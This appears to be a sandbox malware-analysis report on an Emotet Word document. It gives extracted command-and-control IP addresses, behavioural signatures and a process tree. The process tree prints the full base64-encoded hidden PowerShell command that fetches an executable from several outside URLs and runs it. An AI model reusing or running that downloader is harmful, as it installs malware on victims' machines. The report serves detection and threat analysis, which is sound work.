Analysis
-
max time kernel
128s -
max time network
151s -
resource
win10v191014
Task
task1
Sample
Docs_c3d6e9cced9f71d25309a2240eb8b182.44.doc
Resource
win7v191014
General
-
Target
Docs_c3d6e9cced9f71d25309a2240eb8b182.44
-
Sample
191207-zg399v42zs
-
SHA256
819273b637aa3d7db7f8e436d37513443d2eb96b7d449bf11cdd3f1fc221d2b6
Malware Config
Extracted
emotet
172.90.70.168:443
72.69.99.47:80
24.28.178.71:80
172.105.213.30:80
69.30.205.162:7080
50.63.13.135:8080
192.161.190.171:8080
119.159.150.176:443
98.15.140.226:80
190.189.79.73:80
181.44.166.242:80
198.57.217.170:8080
210.224.65.117:80
82.79.244.92:80
72.27.212.209:8080
212.129.14.27:8080
181.47.235.26:993
182.176.116.139:995
142.93.87.198:8080
190.101.87.170:80
81.82.247.216:80
181.197.108.171:443
83.156.88.159:80
139.162.185.116:443
187.233.220.93:443
98.15.140.226:80
192.163.221.191:8080
77.245.12.212:80
45.129.121.222:443
192.241.220.183:8080
124.150.175.129:8080
37.59.24.25:8080
41.218.118.66:80
221.154.59.110:80
110.142.161.90:80
211.218.105.101:80
124.150.175.133:80
60.53.3.153:8080
195.201.56.68:7080
191.100.24.201:50000
83.110.107.243:443
197.90.159.42:80
5.189.148.98:8080
46.17.6.116:8080
81.213.145.45:443
123.142.37.165:80
201.196.15.79:990
152.169.32.143:8080
138.197.140.163:8080
176.58.93.123:80
83.99.211.160:80
115.179.91.58:80
172.90.70.168:443
195.191.107.67:80
80.102.124.98:8080
172.245.13.50:8080
177.103.201.23:80
122.11.164.183:80
80.93.48.49:7080
95.216.207.86:7080
186.215.101.106:80
95.216.212.157:8080
103.122.75.218:80
210.111.160.220:80
174.57.150.13:8080
89.215.225.15:80
212.112.113.235:80
186.66.224.182:990
189.61.200.9:443
78.186.102.195:80
188.230.134.205:80
193.33.38.208:443
163.172.97.112:8080
41.77.74.214:443
178.134.1.238:80
172.104.70.207:8080
201.183.251.100:80
85.105.183.228:443
23.253.207.142:8080
78.46.87.133:8080
72.69.99.47:80
190.161.67.63:80
143.95.101.72:8080
190.5.162.204:80
46.105.131.68:8080
1.32.54.12:8080
113.52.135.33:7080
216.75.37.196:8080
162.144.46.90:8080
51.38.134.203:8080
187.177.155.123:990
189.225.211.171:443
50.116.78.109:8080
192.210.217.94:8080
24.28.178.71:80
200.71.112.158:53
187.250.92.82:80
91.117.31.181:80
157.7.164.178:8081
Signatures
-
Checks system information in the registry (likely anti-VM) 2 TTPs 4 IoCs
Processes:
WINWORD.EXEsvchost.exedescription ioc pid process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer 4912 WINWORD.EXE Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName 4912 WINWORD.EXE Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer 4944 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName 4944 svchost.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
WINWORD.EXEdescription ioc pid process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 4912 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 4912 WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 4912 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily 4912 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 4912 WINWORD.EXE -
Executes dropped EXE 4 IoCs
Processes:
11.exe11.exeacquireinbox.exeacquireinbox.exepid process 4304 11.exe 4208 11.exe 4176 acquireinbox.exe 4076 acquireinbox.exe -
Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs
Processes:
WINWORD.EXEdescription ioc pid process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 4912 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 4912 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
SppExtComObj.exepowershell.exe11.exeacquireinbox.exedescription pid process target process PID 4548 wrote to memory of 4520 4548 SppExtComObj.exe SLUI.exe PID 3680 wrote to memory of 4304 3680 powershell.exe 11.exe PID 4304 wrote to memory of 4208 4304 11.exe 11.exe PID 4176 wrote to memory of 4076 4176 acquireinbox.exe acquireinbox.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exeacquireinbox.exepid process 3680 powershell.exe 4076 acquireinbox.exe -
Processes:
11.exedescription ioc pid process Event created Global\E6D3FF6C8 4208 11.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4912 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3680 powershell.exe -
Drops file in system dir 11 IoCs
Processes:
11.exeacquireinbox.exesvchost.exedescription ioc pid process File renamed C:\Users\Admin\11.exe => C:\Windows\SysWOW64\acquireinbox.exe 4208 11.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat 4076 acquireinbox.exe File opened for modification C:\Windows\Debug\ESE.TXT 4116 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 4076 acquireinbox.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE 4076 acquireinbox.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies 4076 acquireinbox.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 4076 acquireinbox.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp 4116 svchost.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp 4116 svchost.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp 4116 svchost.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp 4116 svchost.exe -
Processes:
svchost.exedescription ioc pid process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" 664 svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1" 664 svchost.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4912 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
WINWORD.EXE11.exe11.exeacquireinbox.exeacquireinbox.exepid process 4912 WINWORD.EXE 4304 11.exe 4208 11.exe 4176 acquireinbox.exe 4076 acquireinbox.exe -
Processes:
WINWORD.EXEdescription ioc pid process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm 4912 WINWORD.EXE File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm 4912 WINWORD.EXE File opened for modification C:\Users\Admin\AppData\Local\Temp\Docs_c3d6e9cced9f71d25309a2240eb8b182.44.doc 4912 WINWORD.EXE File created C:\Users\Admin\AppData\Local\Temp\~$cs_c3d6e9cced9f71d25309a2240eb8b182.44.doc 4912 WINWORD.EXE -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes:
11.exeacquireinbox.exepid process 4208 11.exe 4076 acquireinbox.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_c3d6e9cced9f71d25309a2240eb8b182.44.doc" /o ""1⤵
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
- Checks processor information in registry (likely anti-VM)
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Drops Office document
PID:4912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -en JABBAHMAYQB1AGMAbgBhAHEAZQB6AGgAPQAnAEkAcgB3AHkAeABsAHcAdwBtAGMAaAAnADsAJABGAHAAZwB4AGcAbgBwAHQAIAA9ACAAJwAxADEAJwA7ACQAVgBhAHQAbQB6AHEAZABnAG4AagBzAD0AJwBRAG0AZwB1AHUAbABjAHkAZwBqAG8AcwBoACcAOwAkAFUAaABnAGoAbQBiAGoAcQBjAGwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEYAcABnAHgAZwBuAHAAdAArACcALgBlAHgAZQAnADsAJABPAHAAdAB0AHcAeQBmAHEAbABuAGgAZAA9ACcARABuAGcAeQBwAGcAagBnACcAOwAkAFAAeQBwAGsAegB4AGoAdAB3AD0ALgAoACcAbgBlAHcALQAnACsAJwBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAGUAdAAuAFcAZQBiAEMAbABpAEUAbgBUADsAJABCAGQAaABwAHgAZwBsAHkAPQAnAGgAdAB0AHAAOgAvAC8AbgBlAHcAdAByAGUAbgBkAG0AYQBsAGwALgBzAHQAbwByAGUALwAwADEALQBpAG4AcwB0AGEAbABsAC8AYgBGAE4AaQBXAG4AVgBWAEkALwAqAGgAdAB0AHAAOgAvAC8AcwBjAGEAbQBtAGUAcgByAGUAdgBpAGUAdwBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBEAFMAcwBjAFgASABtAC8AKgBoAHQAdABwADoALwAvAG4AYQBtAGkAcwBhAGYAZgByAG8AbgAuAGMAbwBtAC8AdgA1ADkAcgBuAGkALwBaAFQAdQBhAEoAYQBuAGMAbwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbwBvAGQAZABhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBkAGUANABwADIAZQBjADMALQB3AGoANABtAGcAaABqAG8AdQAtADEANQA4ADgAOQAvACoAaAB0AHQAcABzADoALwAvAG0AYQB4AGIAaQBsAGwALgBkAGUAdgBwAGEAYwBlAC4AbgBlAHQALwBCAGwAbwBnAC8AdgBsADAAMQBzAC0AMwBiAHUAcQBjAGoALQAwADkAOAAwADcANwAzADAANAAxAC8AJwAuACIAUwBwAGAAbABpAFQAIgAoACcAKgAnACkAOwAkAE8AZABxAG8AcQBlAHUAcwB2AGkAPQAnAFEAeQBjAHgAbAB3AHUAZwBuAGgAcwB2AGQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFkAeAB3AGoAZgB2AHYAdABnAGgAYwAgAGkAbgAgACQAQgBkAGgAcAB4AGcAbAB5ACkAewB0AHIAeQB7ACQAUAB5AHAAawB6AHgAagB0AHcALgAiAEQAYABvAHcATgBsAG8AQQBkAGAARgBgAGkATABFACIAKAAkAFkAeAB3AGoAZgB2AHYAdABnAGgAYwAsACAAJABVAGgAZwBqAG0AYgBqAHEAYwBsACkAOwAkAFQAcgBwAGwAaQBoAGcAZgB0AD0AJwBaAGgAdABwAGkAYgBrAGYAdwBpAHcAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABVAGgAZwBqAG0AYgBqAHEAYwBsACkALgAiAGwAZQBuAGAARwBgAFQASAAiACAALQBnAGUAIAAzADQAMAA4ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAQQByAHQAIgAoACQAVQBoAGcAagBtAGIAagBxAGMAbAApADsAJABMAGIAegBoAGsAdQBsAHUAdgBhAGEAPQAnAEkAcQBrAHQAaQBwAHUAdwBuAG4AeAB6AHIAJwA7AGIAcgBlAGEAawA7ACQAWgBhAHgAegB1AHkAeABmAGcAeABqAG0AZgA9ACcAUwBvAGMAZQBjAHAAbQBvAG4AYwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABYAG8AYgBpAHMAagBuAHUAdgBkAGIAPQAnAEwAbABkAHYAegBkAHAAcgBjAHUAagB3AG0AJwA=1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:4548
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent1⤵PID:4520
-
C:\Users\Admin\11.exe"C:\Users\Admin\11.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:4304
-
C:\Users\Admin\11.exe--47f9ceaa1⤵
- Executes dropped EXE
- Emotet Sync
- Drops file in system dir
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
PID:4208
-
C:\Windows\SysWOW64\acquireinbox.exe"C:\Windows\SysWOW64\acquireinbox.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:4176
-
C:\Windows\SysWOW64\acquireinbox.exe--7e452ae21⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Drops file in system dir
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
PID:4076
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in system dir
PID:4116
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:796
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DoSvc1⤵
- Checks system information in the registry (likely anti-VM)
PID:4944
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup1⤵PID:4948
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc1⤵
- Windows security modification
PID:664
Network
MITRE ATT&CK Enterprise v15
MITRE ATT&CK Additional techniques
- T1089